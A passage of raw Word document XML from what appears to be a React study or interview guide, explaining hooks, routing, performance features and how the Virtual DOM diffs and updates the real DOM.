    </w:p>
    <w:p w14:paraId="1AE273A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s state is often used in combination with global state management libraries like Redux or Context API for managing more complex state across components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7CA18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Reusability of Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E285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omponents are highly reusable, meaning the same component can be used in multiple places in the application with different inputs (props).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E59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encourages code reusability and maintains consistency in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F65A5"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Declarative UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB261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makes building UIs </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means you describe what the UI should look like for each state, and React takes care of updating the UI when the state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FF35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ontrasts with imperative programming, where you have to specify exactly how to change the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A79EBB"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React Hooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0381606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oks</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow functional components to manage state, lifecycle methods, and other features that were previously only available in class components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B00B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mon hooks include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F365A85"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State for state management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B8073"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for handling side effects like API calls and subscriptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB9757"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for accessing context values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9BD19"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for accessing DOM elements directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C82F6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React Router (for SPA routing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFCC5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is a popular library for enabling client-side routing in React applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF602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t helps in creating </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-page applications (SPAs)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the page does not reload entirely when navigating between views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4979832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allows you to manage navigation and handle different URL paths with components corresponding to those paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8483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Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E7BE9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reconciliation algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Virtual DOM make UI rendering more efficient by minimizing the number of actual DOM manipulations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87D22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React allows optimization through techniques lik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lazy loading</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de splitting</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shouldComponentUpdate</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in class components) or </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React.memo</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (in functional components).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619591C2"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nidirectional Data Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4205A1C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unidirectional data flow</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means that data flows from parent components to child components through props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C5B7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the application easier to understand and debug.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EE781D"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Ecosystem and Community Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82E93F"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large ecosystem with many supporting libraries and tools such as Redux (state management), React Router (routing), Next.js (server-side rendering), and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AE15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as an active and extensive community, which leads to a wide range of tutorials, resources, and third-party integrations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E39D1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Server-Side Rendering (SSR)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DACE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ools like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Next.js</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, React can be used for </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server-side rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where the content is rendered on the server before being sent to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AF134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performance, especially for SEO and initial page load speed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218454B4"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4. Strong Developer Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB24E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excellent developer tools such as </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React Developer Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which provide an easy-to-use interface for inspecting the component hierarchy, props, and state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D73C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elps in debugging and analyzing the performance of React applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE8C8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5. Cross-Platform Development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6460FF1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extends React to mobile development, allowing you to use React to build mobile applications for iOS and Android.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7826E11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shares a similar development experience to React for the web, and allows for the reuse of code across web and mobile applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0696BB2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6. Easy Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9681D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simple structure that makes testing easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFFD13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ools like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Jest</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for unit testing) and </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React Testing Library</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for component testing) make it easier to write and run tests for React applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10095EEE"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7. TypeScript Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528B9C4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first-class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support, allowing developers to benefit from static typing for props, state, and other parts of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F795D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ypeScript improves developer experience by catching type-related errors early in the development process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453BC2C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8. Integration with Other Libraries and Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AC213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445C4AC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2061664">
          <v:rect id="_x0000_i3800" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF984E5" w14:textId="25220F3F" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="002B263A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="934" w:name="_Toc197868148"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does Virtual DOM work</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="934"/>
    </w:p>
    <w:p w14:paraId="27F3B705" w14:textId="27E62A6F" w:rsidR="00207321" w:rsidRPr="003C7C02" w:rsidRDefault="00207321"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80E7E7">
          <v:rect id="_x0000_i3801" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="476AD7EA"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What is the Virtual DOM?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E9F6B6"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4D6754">
          <v:rect id="_x0000_i3802" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF497F5"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eps in Virtual DOM Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34765331"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Initial Render (First Render)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6259B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lastRenderedPageBreak/>
        <w:t>Initial Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When a React component is first rendered, React creates a virtual representation of the UI components, which is a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This tree mirrors the actual DOM structure, but it's a lightweight, in-memory object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A179B7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 Update</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: React then compares this Virtual DOM to the </w:t>
      </w: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xml:space="preserve"> and applies the necessary changes to the real DOM (like creating, updating, or deleting elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B3041C"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Updating the Virtual DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB179A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ate or Props Change</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When the state or props of a component change, React re-renders the component and creates a new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xml:space="preserve"> for that component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F946FC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 Comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: React then compares the new Virtual DOM with the previous Virtual DOM using an algorithm called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7C901D85"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algorithm identifies </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>differences</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> between the two Virtual DOM trees (known as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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC9726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Reconciliation Process (Diffing Algorithm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3783DC"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performs a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing process</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to detect the changes between the previous Virtual DOM and the new Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CA549B"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ing algorithm compares the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>old Virtual DOM</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new Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C954D"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re are differences, React determines the most efficient way to update the real DOM by applying only the necessary changes, rather than re-rendering everything from scratch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98806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Updating the Real DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8258DE"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atching Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Once the changes are detected, React updates the real DOM in a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This minimizes the number of DOM manipulations, leading to better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4297FCA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fficient Rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Only the parts of the UI that actually changed are updated. This is much faster than a traditional approach where the entire DOM is re-rendered whenever the state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC3D7B3"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81D642">
          <v:rect id="_x0000_i3803" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0336C9BE"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Key Benefits of Virtual DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E63E16"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Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8B77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the overall performance of web applications, especially when there are frequent updates, like in interactive UIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5F4D77"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Efficient Reconciliation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192B8A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reconciliation process, combined with the Virtual DOM, ensures that only the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>changed elements</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are re-rendered, instead of the entire page. This results in faster updates, especially in large-scale applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3671DF09"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Declarative UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49863DF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declarative nature allows developers to define </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>what</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the UI should look like at any given time. React takes care of efficiently updating the UI when the underlying data changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E04744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Cross-Platform Compatibility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BED236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render applications not just in the browser, but also on other platforms like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>React Native</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for mobile devices. The Virtual DOM is used across platforms, making it easier to develop for multiple environments with consistent performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63730F70"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058C86">
          <v:rect id="_x0000_i3804" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024154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implified Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13520E1B"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Initial State</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF3E13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Hello, world!&lt;/h1&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20132EA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1AF0ACC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creates an in-memory Virtual DOM with the structure &lt;h1&gt;Hello, world!&lt;/h1&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E223E45"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This is then compared to the actual DOM (the browser's DOM), and since this is the first render, React updates the real DOM by adding the &lt;h1&gt; element.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB91F8"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fter State Update (e.g., after a user clicks a button)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB93B7"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Goodbye, world!&lt;/h1&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BE84E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71FE9A2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generates a new Virtual DOM with the updated structure &lt;h1&gt;Goodbye, world!&lt;/h1&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D39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React compares the previous Virtual DOM (&lt;h1&gt;Hello, world!&lt;/h1&gt;) to the new one (&lt;h1&gt;Goodbye, world!&lt;/h1&gt;). The difference is identified: the text inside the &lt;h1&gt; element has changed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C37D11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Update Real DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: React then updates the real DOM by changing the content of the &lt;h1&gt; element to Goodbye, world!.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745C187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ECD5E9">
          <v:rect id="_x0000_i3805" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C249722"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5. How Virtual DOM Helps React:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6A27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inimal DOM Manipulation</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of re-rendering the entire DOM every time the state changes, React uses the Virtual DOM to figure out the differences and only applies changes where necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49542C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ast Rendering</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This approach speeds up rendering significantly, especially for complex applications with frequent updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D300FA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edictable Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Because React performs all updates in a controlled manner, the process is </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
